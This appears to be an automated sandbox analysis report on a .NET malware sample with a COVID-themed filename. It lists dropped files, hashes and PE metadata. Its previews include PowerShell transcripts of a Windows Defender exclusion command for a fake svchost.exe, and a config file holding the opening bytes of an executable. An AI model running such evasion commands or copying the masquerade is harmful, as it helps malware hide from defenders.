                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <sectionGroup name="userSettings" type="System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" >.. <section name="OFsolWNmcACanMRUGVrizHZQUfsWIOTyZhqcUVDdVirxOPB.BFGYtGVcaKuKMuwoE" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowExeDefinition="MachineToLocalUser" requirePermission="false" />.. </sectionGroup>.. </configSections>.. <userSettings>.. <OFsolWNmcACanMRUGVrizHZQUfsWIOTyZhqcUVDdVirxOPB.BFGYtGVcaKuKMuwoE>.. <setting name="AYhFcoOUTPAsNEJFbVkZa" serializeAs="String">.. <value>77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 128 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97
                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svchost.exe.log
                                                                        Process:C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1216
                                                                        Entropy (8bit):5.355304211458859
                                                                        Encrypted:false
                                                                        SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7GE4Kx1qE4KE4x84j:MxHKXwYHKhQnoPtHoxHhAHKzvGHKx1qs
                                                                        MD5:91AB2D220C13261DC89826F3B5F173D0
                                                                        SHA1:503DC61AC5CA2C7B963EA347D0D760980E4AE78F
                                                                        SHA-256:5FB683D310C9E0F8BEDD39A213C8290920450979BAB921CD0A3F0CA31A308E4A
                                                                        SHA-512:C9D6BF543A1BBE7552733779A996189282CF053087FEE646C871A6B7F03EEC70D2DA6A6CF25208FBDD0851963C1275159AD07016B9E713E1B57BB616CDC1F89B
                                                                        Malicious:false
                                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, Publi
                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):14734
                                                                        Entropy (8bit):4.993014478972177
                                                                        Encrypted:false
                                                                        SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
                                                                        MD5:8D5E194411E038C060288366D6766D3D
                                                                        SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
                                                                        SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
                                                                        SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
                                                                        Malicious:false
                                                                        Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):21544
                                                                        Entropy (8bit):5.585174318095792
                                                                        Encrypted:false
                                                                        SSDEEP:384:rtL6ojmmTH6mfRYSBKnojul6i8aepEQeZUn1u16zq5maxHVw38gCIvUI++j/:zmmTHs4KoClya+EpC3qUCm/Cly
                                                                        MD5:9CF94556F1F34D114B11C0663625F1DC
                                                                        SHA1:9C63907AA246A612BAA74322D06036DC35686000
                                                                        SHA-256:89F18529703F4229B00160C737E0BEFD33EE1B02B40C94E5038B5F3AE6E4AF0E
                                                                        SHA-512:A52D4CA11B05B520EB6BA25214D49AD1D63B344DDD416BFB9837A92EB85306608CEDF33C49437080D3CD732820CB5201120C537EED79A1195EFF891BEF045326
                                                                        Malicious:false
                                                                        Preview: @...e.........................~.Y...D...D............@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)T.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,j.....(.Microsoft.PowerShell.Commands.ManagementT................7.,.fiD..............*.Microsoft.Management.Inf
                                                                        C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):0.10987860287095041
                                                                        Encrypted:false
                                                                        SSDEEP:12:26H0sjXm/Ey6q9995/bGq3qQ10nMCldimE8eawHjcyf:26ql68ZXLyMCldzE9BHjci
                                                                        MD5:1F925FCA56A2A3066F00CBA80A43701D
                                                                        SHA1:24720347D9A7D4B86AE847F9B75361A753F25CF6
                                                                        SHA-256:D08F048D6270A50D4EB8DE6FAF75CC700228CF5A4BB40398CD95385035B90918
                                                                        SHA-512:8D64CA6D539C17A558621E69381EB65FF8703FB85B291F7B2C96491DF05D303C9F7DE035525EC90702B0B4C1A6C18EEA78045F538EA1FCF6CB7F79591D36C93B
                                                                        Malicious:false
                                                                        Preview: ................................................................................\................................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.............................................................7+..... .....v..Ou...........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.\...............................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):0.11254085572117778
                                                                        Encrypted:false
                                                                        SSDEEP:12:IEjXm/Ey6q9995/bR1miM3qQ10nMCldimE8eawHza1miI0UP:ml68Zl1tMLyMCldzE9BHza1tI0E
                                                                        MD5:33003BC4A49F4CF46170C0497FF28A33
                                                                        SHA1:BE8B57158236941F3828B53A4BA5EE6382EB7CF7
                                                                        SHA-256:DD5876166794548F3BE2113E87ABB80345D5C1B79B8B5487F797EC20822E165C
                                                                        SHA-512:0DC4D464F3B5778A03C6C2DBCF846AA5D700ABD77E4F04FDF75E858D65DB3E2DC5E26E56B2946693AEA3534D323B6DBF4329D4D0D89CB7675F1769375C60AF25
                                                                        Malicious:false
                                                                        Preview: ................................................................................\................................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.............................................................7+..... ........Ou...........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.\.......Y.......................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):0.11234020995834726
                                                                        Encrypted:false
                                                                        SSDEEP:12:/6jXm/Ey6q9995/b2w1mK2P3qQ10nMCldimE8eawHza1mK1oXP://l68ZD1iPLyMCldzE9BHza1Ru
                                                                        MD5:AEE93FEF49A95DCCA7BE060A2E2EF34D
                                                                        SHA1:C5602954298F8A7DA9254303E520577A0BBAFFFE
                                                                        SHA-256:BA18EFD0525720BCE454D8900C3D996721B1A2489CBC2410CF39BB39123E10B4
                                                                        SHA-512:AC24AD4C059427C8988D0054D4512F4CAE8CE2985FC9D2DE7E6A14F5AE2116C8EDD89DEC4465AC194AA42F7269EF863B2B3FC53422277AE8985121DD9054F96F
                                                                        Malicious:false
                                                                        Preview: ................................................................................\.......Jb.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.............................................................7+..... ......s.Ou...........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.\.......yi......................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mkwequj1.yo0.psm1
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:very short file (no magic)
                                                                        Category:dropped
                                                                        Size (bytes):1
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3:U:U
                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                        Malicious:false
                                                                        Preview: 1
                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oakhxzia.2dl.ps1
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:very short file (no magic)
                                                                        Category:dropped
                                                                        Size (bytes):1
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3:U:U
                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                        Malicious:false
                                                                        Preview: 1
                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qgtzpkku.luh.psm1
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:very short file (no magic)
                                                                        Category:dropped
                                                                        Size (bytes):1
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3:U:U
                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                        Malicious:false
                                                                        Preview: 1
                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ti3ey4z3.avd.ps1
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:very short file (no magic)
                                                                        Category:dropped
                                                                        Size (bytes):1
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3:U:U
                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                        Malicious:false
                                                                        Preview: 1
                                                                        C:\Users\user\Documents\20210309\PowerShell_transcript.936905.DbJYrCru.20210309221943.txt
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):5841
                                                                        Entropy (8bit):5.410656943651606
                                                                        Encrypted:false
                                                                        SSDEEP:96:BZ9hIN4qDo1ZDZchIN4qDo1Z9N31jZ/hIN4qDo1Z3oFF7Zw:2
                                                                        MD5:4F985C0A72158C34FD9CAF8686B952DD
                                                                        SHA1:7CA5EF31198C773BCBCFDF8BAD6F55BBC4A9439D
                                                                        SHA-256:E6738F98C50D65217366024C9D91F947446E839C3DB4B264183E6058E3D39FE9
                                                                        SHA-512:DDC9E224ECFCE24D376DB56E53AF237147979D286466D8CE805536A4A42F1F26F589860E857EDAE64FC6E513D2ABD6D477FE8128036DB1982C076EDD342CE3F8
                                                                        Malicious:false
                                                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20210309222002..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 936905 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe -Force..Process ID: 6552..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210309222002..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210309222322..Username: computer\user..RunAs
                                                                        C:\Users\user\Documents\20210309\PowerShell_transcript.936905.LRCx2CiE.20210309221857.txt
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):5841
                                                                        Entropy (8bit):5.412521613239556
                                                                        Encrypted:false
                                                                        SSDEEP:96:BZmhINKqDo1Z4ZchINKqDo1ZGN31jZ+hINKqDo1ZgoFF7Zw:P
                                                                        MD5:2A650E566B7ED33E1F1B1D6A68A7CB77
                                                                        SHA1:E9C8CF5044CBB7E69E5D8990BBA8CB5B147B34A5
                                                                        SHA-256:0E40EE5ABB643DB654FEDC0CEEAB6FD2158142ECF4553B3D52B81444D896FA98
                                                                        SHA-512:BAD74E176C2A7FAB24B69CC06AFE9A3FD52D5758C661A8599599D3937129132B2B4A735AD83E726CE2CA13BE0A3AD216F968F242D97FA0C63F455E002AF94CCF
                                                                        Malicious:false
                                                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20210309221909..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 936905 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe -Force..Process ID: 6864..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210309221909..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210309222322..Username: computer\user..RunAs
                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):55
                                                                        Entropy (8bit):4.306461250274409
                                                                        Encrypted:false
                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                        Malicious:false
                                                                        Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):6.247071799238702
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                        File name:New variant of covid 19.exe
                                                                        File size:45816
                                                                        MD5:a489513ca0de2472e0ad79830dd9ac44
                                                                        SHA1:b767fe686e074f551773f208e1cb756d114e38c4
                                                                        SHA256:df12835cd6bc77f9724900d2bf8f0403364ce6e8e81d389f8dc3b2eb8ca42961
                                                                        SHA512:e5cddfc3c32af524ab2ca1cb671034c0d46f1b3d4e83e98fb0fd5af198fbfbc93651e8381fcde18f40558994c5f2f76d6a8a6304dd4c7edc6de93a2ef912dd5c
                                                                        SSDEEP:768:A1+uC50TPNWMtxscrP3v0lH51S+T8rBItHvhZQ96xdfBu2uAHubhK:ApPT1x53vW1TSItPbJL
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....r..........."...0.................. ........@.. ....................................@................................

                                                                        File Icon

                                                                        Icon Hash:00828e8e8686b000

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x40b29e
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:true
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                        Time Stamp:0xBB7292A1 [Tue Aug 27 16:53:53 2069 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:v4.0.30319
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                        Authenticode Signature

                                                                        Signature Valid:false
                                                                        Signature Issuer:C=kcFWAarjwdapdyUkLZLiDRQOeDLodXopXxPlVk, S=NEhdXbf, L=qyTkgVquhASRSKoKYwmGeM, T=mYPXLriIbXMrgagRzkuCZrKlYMbEKaSCodvj, E=UQKHEvtefJvMrDJdfPLSDmOMUnptYojksODsTRYRZBOUsZ, OU=dHTmcaEebRrKntayjdBvuldHxpfqPIScAcbl, O=lQjFUFZdRYmIRAZJMieSNcNHjAuWwuIgrbShGlf, CN=eXPQaJHXdamnWCRaxvyTm
                                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                        Error Number:-2146762487
                                                                        Not Before:3/9/2021 10:48:18 AM
                                                                        Not After:3/9/2022 10:48:18 AM
                                                                        Subject Chain
                                                                        • C=kcFWAarjwdapdyUkLZLiDRQOeDLodXopXxPlVk, S=NEhdXbf, L=qyTkgVquhASRSKoKYwmGeM, T=mYPXLriIbXMrgagRzkuCZrKlYMbEKaSCodvj, E=UQKHEvtefJvMrDJdfPLSDmOMUnptYojksODsTRYRZBOUsZ, OU=dHTmcaEebRrKntayjdBvuldHxpfqPIScAcbl, O=lQjFUFZdRYmIRAZJMieSNcNHjAuWwuIgrbShGlf, CN=eXPQaJHXdamnWCRaxvyTm
                                                                        Version:3
                                                                        Thumbprint MD5:BE5AD423DD7C907B424C8B9C2061CC99
                                                                        Thumbprint SHA-1:AD1BB85807FFF4B86998EDDBAB341DF7F850C8A0
                                                                        Thumbprint SHA-256:AE747540F8C83FC5D02AC93EE8D7802B5D28D7C526446BEB9948514E1324453C
                                                                        Serial:008C4D69E91A585A2AB4CFD46A96450C12

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        jmp dword ptr [00402000h]
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al

                                                                        Data Directories

                                                                        Name                                   Virtual Address  Virtual Size  Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT           0x0              0x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT           0xb24c           0x4f          .text
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE         0xc000           0x470         .rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION        0x0              0x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY         0x9e00           0x14f8
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC        0xe000           0xc           .reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG            0x0              0x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT        0x0              0x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR        0x0              0x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS              0x0              0x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG      0x0              0x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT     0x0              0x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT              0x2000           0x8           .text
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT     0x0              0x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR   0x2008           0x48          .text
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED         0x0              0x0

                                                                        Sections

                                                                        Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy          Characteristics
                                                                        .text   0x2000           0x92a4        0x9400    False     0.517261402027   data       6.0971963196     IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                        .rsrc   0xc000           0x470         0x600     False     0.363932291667   data       4.07092781148    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc  0xe000           0xc           0x200     False     0.044921875      data       0.0815394123432  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        Name        RVA     Size   Type  Language  Country
                                                                        RT_VERSION  0xc058  0x418  data  English   United States

                                                                        Imports

                                                                        DLL          Import
                                                                        mscoree.dll  _CorExeMain

